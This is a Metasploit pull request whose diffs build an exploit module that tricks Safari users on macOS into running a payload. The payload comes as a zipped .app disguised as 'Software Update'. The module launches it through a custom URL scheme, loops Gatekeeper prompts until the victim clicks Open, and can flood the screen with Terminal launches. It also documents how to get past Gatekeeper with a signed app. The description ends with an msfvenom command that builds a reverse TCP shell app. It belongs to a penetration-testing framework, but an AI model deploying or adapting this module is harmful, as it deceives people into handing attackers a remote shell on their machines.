### PR TITLE
Safari user-assisted download launch module

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -624,7 +624,7 @@ require 'msf/core/exe/segment_injector'
   def self.to_osx_app(exe, opts={})
     exe_name    = opts[:exe_name]    || Rex::Text.rand_text_alpha(8)
     app_name    = opts[:app_name]    || Rex::Text.rand_text_alpha(8)
-    extra_plist = opts[:plist_extra] || ''
+    plist_extra = opts[:plist_extra] || ''
 
     app_name.chomp!(".app")
     app_name += ".app"

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -617,11 +617,16 @@ require 'msf/core/exe/segment_injector'
   end
 
   # @param [Hash] opts the options hash
+  # @option opts [String] :exe_name (random) the name of the macho exe file (never seen by the user)
+  # @option opts [String] :app_name (random) the name of the OSX app
+  # @option opts [String] :plist_extra ('') some extra data to shove inside the Info.plist file
   # @return [String] zip archive containing an OSX .app directory
   def self.to_osx_app(exe, opts={})
     exe_name    = opts[:exe_name]    || Rex::Text.rand_text_alpha(8)
     app_name    = opts[:app_name]    || Rex::Text.rand_text_alpha(8)
-    extra_plist = opts[:extra_plist] || ''
+    extra_plist = opts[:plist_extra] || ''
+
+    app_name.chomp!(".app")
     app_name += ".app"
 
     info_plist = %Q|
@@ -637,7 +642,7 @@ require 'msf/core/exe/segment_injector'
   <string>#{exe_name}</string>
   <key>CFBundlePackageType</key>
   <string>APPL</string>
-  #{extra_plist}
+  #{plist_extra}
 </dict>
 </plist>
     |

--- a/lib/rex/zip/archive.rb
+++ b/lib/rex/zip/archive.rb
@@ -17,6 +17,21 @@ class Archive
     @entries = []
   end
 
+  #
+  # Recursively adds a directory of files into the archive.
+  #
+  def add_r(dir)
+    path = File.dirname(dir)
+    Dir[File.join(dir, "**", "**")].each do |file|
+      relative = file.sub(/^#{path.chomp('/')}\//, '')
+      if File.directory?(file)
+        @entries << Entry.new(relative.chomp('/') + '/', '', @compmeth, nil, EFA_ISDIR, nil, nil)
+      else
+        contents = File.read(file, :mode => 'rb')
+        @entries << Entry.new(relative, contents, @compmeth, nil, nil, nil, nil)
+      end
+    end
+  end
 
   #
   # Create a new Entry and add it to the archive.

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -135,7 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
       </array>
     |
 
-    Msf::Util::EXE.to_osx_app(generate_payload_exe,
+    my_payload = generate_payload_exe(:platform => [Msf::Module::Platform::OSX])
+    Msf::Util::EXE.to_osx_app(my_payload,
       :app_name    => datastore['APP_NAME'],
       :plist_extra => plist_extra
     )

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -102,11 +102,10 @@ class Metasploit3 < Msf::Exploit::Remote
       f.src = "#{get_module_resource}/#{datastore['APP_NAME']}.zip?seed="+r;
       window.setTimeout(function(){
         var go = function() { f.src = "openurl"+r+"://a"; };
+        go();
         if (#{datastore['LOOP']}) {
-          window.setInterval(go, 100);
-        } else {
-          go();
-        }
+          window.setInterval(go, #{datastore['LOOP_DELAY']});
+        };
       }, #{datastore['DELAY']});
       if (#{datastore['CONFUSE']}) {
         var w = 0;

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -8,7 +8,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = ManualRanking
 
   include Msf::Exploit::EXE
   include Msf::Exploit::Remote::BrowserExploitServer
@@ -28,6 +28,12 @@ class Metasploit3 < Msf::Exploit::Remote
         want to open it?
 
         If the user clicks "Open", the app and its payload are executed.
+
+        If the user has the "Only allow applications downloaded from: Mac App Store
+        and identified developers (on by default on OS 10.8+), the user will see
+        an error dialog containing "can't be opened because it is from an unidentified
+        developer." To work around this issue, you will need to manually build and sign
+        an OSX app containing your payload, and specify that app .
 
         You can put newlines & unicode in your APP_NAME, although you must be careful not
         to create a prompt that is too tall, or the user will not be able to click
@@ -69,7 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
       OptBool.new('LOOP', [false, "Continually display prompt until app is run", true]),
       OptInt.new('LOOP_DELAY', [false, "Time to wait before trying to launch again", 3000]),
       OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]),
-      OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting, please wait..."])
+      OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting, please wait..."]),
+      OptPath.new('SIGNED_APP'), [false, "A signed .app to drop, to workaround OS 10.8+ settings"])
     ], self.class)
   end
 
@@ -121,24 +128,31 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def app_zip(seed)
-    plist_extra = %Q|
-      <key>CFBundleURLTypes</key>
-      <array>
-        <dict>
-          <key>CFBundleURLName</key>
-          <string>Local File</string>
-          <key>CFBundleURLSchemes</key>
-          <array>
-            <string>openurl#{seed}</string>
-          </array>
-        </dict>
-      </array>
-    |
+    if datastore['SIGNED_APP'].present?
+      signed_app = datastore['SIGNED_APP']
+      zip = Rex::Zip::Archive.new
+      zip.add_file(signed_app, File.read(signed_app, :mode => 'rb'))
+      zip.pack
+    else
+      plist_extra = %Q|
+        <key>CFBundleURLTypes</key>
+        <array>
+          <dict>
+            <key>CFBundleURLName</key>
+            <string>Local File</string>
+            <key>CFBundleURLSchemes</key>
+            <array>
+              <string>openurl#{seed}</string>
+            </array>
+          </dict>
+        </array>
+      |
 
-    my_payload = generate_payload_exe(:platform => [Msf::Module::Platform::OSX])
-    Msf::Util::EXE.to_osx_app(my_payload,
-      :app_name    => datastore['APP_NAME'],
-      :plist_extra => plist_extra
-    )
+      my_payload = generate_payload_exe(:platform => [Msf::Module::Platform::OSX])
+      Msf::Util::EXE.to_osx_app(my_payload,
+        :app_name    => datastore['APP_NAME'],
+        :plist_extra => plist_extra
+      )
+    end
   end
 end

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -1,0 +1,168 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+
+  # Note: might be nicer to do this with mounted FTP share, since we can
+  # unmount after the attack and not leave a trace on user's machine.
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Safari User-Assisted Download & Run Attack',
+      'Description'    => %q{
+        This module abuses some Safari functionality to force the download of a
+        zipped .app OSX application containing our payload. The app is then
+        invoked using a custom URL scheme. At this point, the user is presented
+        with Gatekeeper's prompt:
+
+        "APP_NAME" is an application downloaded from the internet. Are you sure you
+        want to open it?
+
+        If the user clicks "Open", the app and its payload are executed.
+
+        You can put newlines & unicode in your APP_NAME, although you must be careful not
+        to create a prompt that is too tall, or the user will not be able to click
+        the buttons, and will have to either logout or kill the CoreServicesUIAgent
+        process.
+      },
+      'License'        => MSF_LICENSE,
+      'Targets'        =>
+        [
+          [ 'Mac OS X x86 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X86,
+            }
+          ],
+          [ 'Mac OS X x64 (Native Payload)',
+            {
+              'Platform' => 'osx',
+              'Arch' => ARCH_X64,
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'Author'         => [ 'joev <joev[at]metasploit.com>' ]
+    ))
+
+    register_options(
+      [
+        OptString.new('APP_NAME', [false, "The name of the app to display", "Software Update"]),
+        OptInt.new('DELAY', [false, "Number of milliseconds to wait before trying to open", 1500]),
+        OptBool.new('LOOP', [false, "Continually display prompt until app is run", true]),
+        OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]),
+        OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting you, please wait..."]),
+      ], self.class)
+  end
+
+  def on_request_uri(cli, request)
+    if request.uri =~ /\.zip/
+      print_status("Sending .zip containing app.")
+      seed = request.qstring['seed'].to_i
+      send_response(cli, app_zip(seed), { 'Content-Type' => 'application/zip' })
+    else
+      # send initial HTML page
+      print_status("Sending #{self.name}")
+      send_response_html(cli, generate_html)
+    end
+    handler(cli)
+  end
+
+  def generate_html
+    %Q|
+    <html><body>
+    #{datastore['CONTENT']}
+    <iframe id='f' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
+    </iframe>
+    <iframe id='f2' src='about:blank' style='position:fixed;left:-500px;top:-500px;width:1px;height:1px;'>
+    </iframe>
+    <script>
+    (function() {
+      var r = parseInt(Math.random() * 9999999);
+      var f = document.getElementById('f');
+      var f2 = document.getElementById('f2');
+      f.src = "#{get_resource}/#{datastore['APP_NAME']}.zip?seed="+r;
+      window.setTimeout(function(){
+        var go = function() { f.src = "openurl"+r+"://a"; };
+        if (#{datastore['LOOP']}) {
+          window.setInterval(go, 100);
+        } else {
+          go();
+        }
+      }, #{datastore['DELAY']});
+      if (#{datastore['CONFUSE']}) {
+        var w = 0;
+        var ivl = window.setInterval(function(){
+          f2.src = 'ssh://ssh@ssh';
+          if (w++ > 200) clearInterval(ivl);
+        }, 10);
+      }
+    })();
+    </script>
+    </body></html>
+    |
+  end
+
+  def app_zip(seed)
+    exe = if x86?
+      Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded, target.opts)
+    elsif x64?
+      Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded, target.opts)
+    end
+    exe_name = Rex::Text.rand_text_alpha(8)
+    app_name = "#{datastore['APP_NAME']}.app"
+    info_plist = %Q|
+      <?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+  <key>CFBundleAllowMixedLocalizations</key>
+  <true/>
+  <key>CFBundleDevelopmentRegion</key>
+  <string>English</string>
+  <key>CFBundleExecutable</key>
+  <string>#{exe_name}</string>
+  <key>CFBundleIdentifier</key>
+  <string>com.#{exe_name}.app</string>
+  <key>CFBundleName</key>
+  <string>#{exe_name}</string>
+  <key>CFBundlePackageType</key>
+  <string>APPL</string>
+  <key>CFBundleURLTypes</key>
+  <array>
+    <dict>
+      <key>CFBundleURLName</key>
+      <string>Local File</string>
+      <key>CFBundleURLSchemes</key>
+      <array>
+        <string>openurl#{seed}</string>
+      </array>
+    </dict>
+  </array>
+</dict>
+</plist>
+    |
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file("#{app_name}/", '')
+    zip.add_file("#{app_name}/Contents/", '')
+    zip.add_file("#{app_name}/Contents/MacOS/", '')
+    zip.add_file("#{app_name}/Contents/Resources/", '')
+    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe)
+    zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
+    zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
+    zip.pack
+  end
+
+  def x86?; target.name =~ /x86/; end
+  def x64?; target.name =~ /x86/; end
+end

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -10,8 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::BrowserExploitServer
 
   # Note: might be nicer to do this with mounted FTP share, since we can
   # unmount after the attack and not leave a trace on user's machine.
@@ -51,7 +50,16 @@ class Metasploit3 < Msf::Exploit::Remote
           ]
         ],
       'DefaultTarget'  => 0,
-      'Author'         => [ 'joev <joev[at]metasploit.com>' ]
+      'Author'         => [ 'joev' ],
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::SAFARI,
+        :os_name => OperatingSystems::MAC_OSX,
+
+        # On 10.6.8 (Safari 5.x), a dialog never appears unless the user
+        # has already manually launched the dropped exe
+        :ua_ver  => /^[^5]/
+      }
     ))
 
     register_options([
@@ -60,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
       OptBool.new('LOOP', [false, "Continually display prompt until app is run", true]),
       OptInt.new('LOOP_DELAY', [false, "Time to wait before trying to launch again", 3000]),
       OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]),
-      OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting you, please wait..."])
+      OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting, please wait..."])
     ], self.class)
   end
 
@@ -113,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def app_zip(seed)
-    extra_plist = %Q|
+    plist_extra = %Q|
       <key>CFBundleURLTypes</key>
       <array>
         <dict>
@@ -129,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     Msf::Util::EXE.to_osx_app(generate_payload_exe,
       :app_name    => datastore['APP_NAME'],
-      :extra_plist => extra_plist
+      :plist_extra => plist_extra
     )
   end
 end

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -54,15 +54,14 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         => [ 'joev <joev[at]metasploit.com>' ]
     ))
 
-    register_options(
-      [
-        OptString.new('APP_NAME', [false, "The name of the app to display", "Software Update"]),
-        OptInt.new('DELAY', [false, "Number of milliseconds to wait before trying to open", 2500]),
-        OptBool.new('LOOP', [false, "Continually display prompt until app is run", true]),
-        OptInt.new('LOOP_DELAY', [false, "Time to wait before trying to launch again", 3000]),
-        OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]),
-        OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting you, please wait..."]),
-      ], self.class)
+    register_options([
+      OptString.new('APP_NAME', [false, "The name of the app to display", "Software Update"]),
+      OptInt.new('DELAY', [false, "Number of milliseconds to wait before trying to open", 2500]),
+      OptBool.new('LOOP', [false, "Continually display prompt until app is run", true]),
+      OptInt.new('LOOP_DELAY', [false, "Time to wait before trying to launch again", 3000]),
+      OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]),
+      OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting you, please wait..."])
+    ], self.class)
   end
 
   def on_request_uri(cli, request)
@@ -114,56 +113,23 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def app_zip(seed)
-    exe = if x86?
-      Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded, target.opts)
-    elsif x64?
-      Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded, target.opts)
-    end
-    exe_name = Rex::Text.rand_text_alpha(8)
-    app_name = "#{datastore['APP_NAME']}.app"
-    info_plist = %Q|
-      <?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-  <key>CFBundleAllowMixedLocalizations</key>
-  <true/>
-  <key>CFBundleDevelopmentRegion</key>
-  <string>English</string>
-  <key>CFBundleExecutable</key>
-  <string>#{exe_name}</string>
-  <key>CFBundleIdentifier</key>
-  <string>com.#{exe_name}.app</string>
-  <key>CFBundleName</key>
-  <string>#{exe_name}</string>
-  <key>CFBundlePackageType</key>
-  <string>APPL</string>
-  <key>CFBundleURLTypes</key>
-  <array>
-    <dict>
-      <key>CFBundleURLName</key>
-      <string>Local File</string>
-      <key>CFBundleURLSchemes</key>
+    extra_plist = %Q|
+      <key>CFBundleURLTypes</key>
       <array>
-        <string>openurl#{seed}</string>
+        <dict>
+          <key>CFBundleURLName</key>
+          <string>Local File</string>
+          <key>CFBundleURLSchemes</key>
+          <array>
+            <string>openurl#{seed}</string>
+          </array>
+        </dict>
       </array>
-    </dict>
-  </array>
-</dict>
-</plist>
     |
 
-    zip = Rex::Zip::Archive.new
-    zip.add_file("#{app_name}/", '')
-    zip.add_file("#{app_name}/Contents/", '')
-    zip.add_file("#{app_name}/Contents/MacOS/", '')
-    zip.add_file("#{app_name}/Contents/Resources/", '')
-    zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe)
-    zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
-    zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
-    zip.pack
+    Msf::Util::EXE.to_osx_app(generate_payload_exe,
+      :app_name    => datastore['APP_NAME'],
+      :extra_plist => extra_plist
+    )
   end
-
-  def x86?; target.name =~ /x86/; end
-  def x64?; target.name =~ /x86/; end
 end

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -10,6 +10,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::EXE
   include Msf::Exploit::Remote::BrowserExploitServer
 
   # Note: might be nicer to do this with mounted FTP share, since we can
@@ -58,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
         # On 10.6.8 (Safari 5.x), a dialog never appears unless the user
         # has already manually launched the dropped exe
-        :ua_ver  => /^[^5]/
+        :ua_ver  => lambda { |ver| ver.to_i != 5 }
       }
     ))
 
@@ -72,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
     ], self.class)
   end
 
-  def on_request_uri(cli, request)
+  def on_request_exploit(cli, request, profile)
     if request.uri =~ /\.zip/
       print_status("Sending .zip containing app.")
       seed = request.qstring['seed'].to_i
@@ -98,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
       var r = parseInt(Math.random() * 9999999);
       var f = document.getElementById('f');
       var f2 = document.getElementById('f2');
-      f.src = "#{get_resource}/#{datastore['APP_NAME']}.zip?seed="+r;
+      f.src = "#{get_module_resource}/#{datastore['APP_NAME']}.zip?seed="+r;
       window.setTimeout(function(){
         var go = function() { f.src = "openurl"+r+"://a"; };
         if (#{datastore['LOOP']}) {

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -57,8 +57,9 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('APP_NAME', [false, "The name of the app to display", "Software Update"]),
-        OptInt.new('DELAY', [false, "Number of milliseconds to wait before trying to open", 1500]),
+        OptInt.new('DELAY', [false, "Number of milliseconds to wait before trying to open", 2500]),
         OptBool.new('LOOP', [false, "Continually display prompt until app is run", true]),
+        OptInt.new('LOOP_DELAY', [false, "Time to wait before trying to launch again", 3000]),
         OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]),
         OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting you, please wait..."]),
       ], self.class)
@@ -104,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
         var ivl = window.setInterval(function(){
           f2.src = 'ssh://ssh@ssh';
           if (w++ > 200) clearInterval(ivl);
-        }, 10);
+        }, #{datastore['LOOP_DELAY']});
       }
     })();
     </script>

--- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
+++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb
@@ -29,11 +29,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
         If the user clicks "Open", the app and its payload are executed.
 
-        If the user has the "Only allow applications downloaded from: Mac App Store
+        If the user has the "Only allow applications downloaded from Mac App Store
         and identified developers (on by default on OS 10.8+), the user will see
         an error dialog containing "can't be opened because it is from an unidentified
         developer." To work around this issue, you will need to manually build and sign
-        an OSX app containing your payload, and specify that app .
+        an OSX app containing your payload with a custom URL handler called "openurl".
 
         You can put newlines & unicode in your APP_NAME, although you must be careful not
         to create a prompt that is too tall, or the user will not be able to click
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
       OptInt.new('LOOP_DELAY', [false, "Time to wait before trying to launch again", 3000]),
       OptBool.new('CONFUSE', [false, "Pops up a million Terminal prompts to confuse the user", false]),
       OptString.new('CONTENT', [false, "Content to display in browser", "Redirecting, please wait..."]),
-      OptPath.new('SIGNED_APP'), [false, "A signed .app to drop, to workaround OS 10.8+ settings"])
+      OptPath.new('SIGNED_APP', [false, "A signed .app to drop, to workaround OS 10.8+ settings"])
     ], self.class)
   end
 
@@ -104,6 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <script>
     (function() {
       var r = parseInt(Math.random() * 9999999);
+      if (#{datastore['SIGNED_APP'].present?}) r = '';
       var f = document.getElementById('f');
       var f2 = document.getElementById('f2');
       f.src = "#{get_module_resource}/#{datastore['APP_NAME']}.zip?seed="+r;
@@ -129,9 +130,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def app_zip(seed)
     if datastore['SIGNED_APP'].present?
-      signed_app = datastore['SIGNED_APP']
+      print_status "Zipping custom app bundle..."
       zip = Rex::Zip::Archive.new
-      zip.add_file(signed_app, File.read(signed_app, :mode => 'rb'))
+      zip.add_r(datastore['SIGNED_APP'])
       zip.pack
     else
       plist_extra = %Q|


### PR DESCRIPTION
This adds a JSA-style user assisted exploit for all versions of safari.  I noticed a while ago if I serve an zipped .app with a custom URL scheme to a Safari user, I can then immediately call that custom URL scheme from safari and launch the app. Quarantine prevents the app from just running, and the user is presented with a "Are you sure you want to launch this app". Funny enough, you can continually spam requests to the custom URL scheme and force the user into a loop until he clicks okay (this is the LOOP option). Another funny thing to do is the CONFUSE option, which tries to spawn tons of Terminal windows to further confuse and frustrate.

On 10.9, the CONFUSE option is not so useful, and the LOOP option sometimes goes too fast and will generate a "Unknown error failure" popup (imo this just adds to the confusion).

Verification:
- [x] Run the module, visit the URL in any safari, click "Okay" when presented with the promp
- [x] Play around with the LOOP and CONFUSE options
- [x] Ensure that on Safari 5.x (OSX 10.6.x) this module serves a 404 
- [x] Ensure you can generate an OSX app with msfvenom:
  
  ```
  $ ./msfvenom -p osx/x64/shell_reverse_tcp -f osx-app LHOST=0.0.0.0 LPORT=9999 > ./osx.zip
  ```
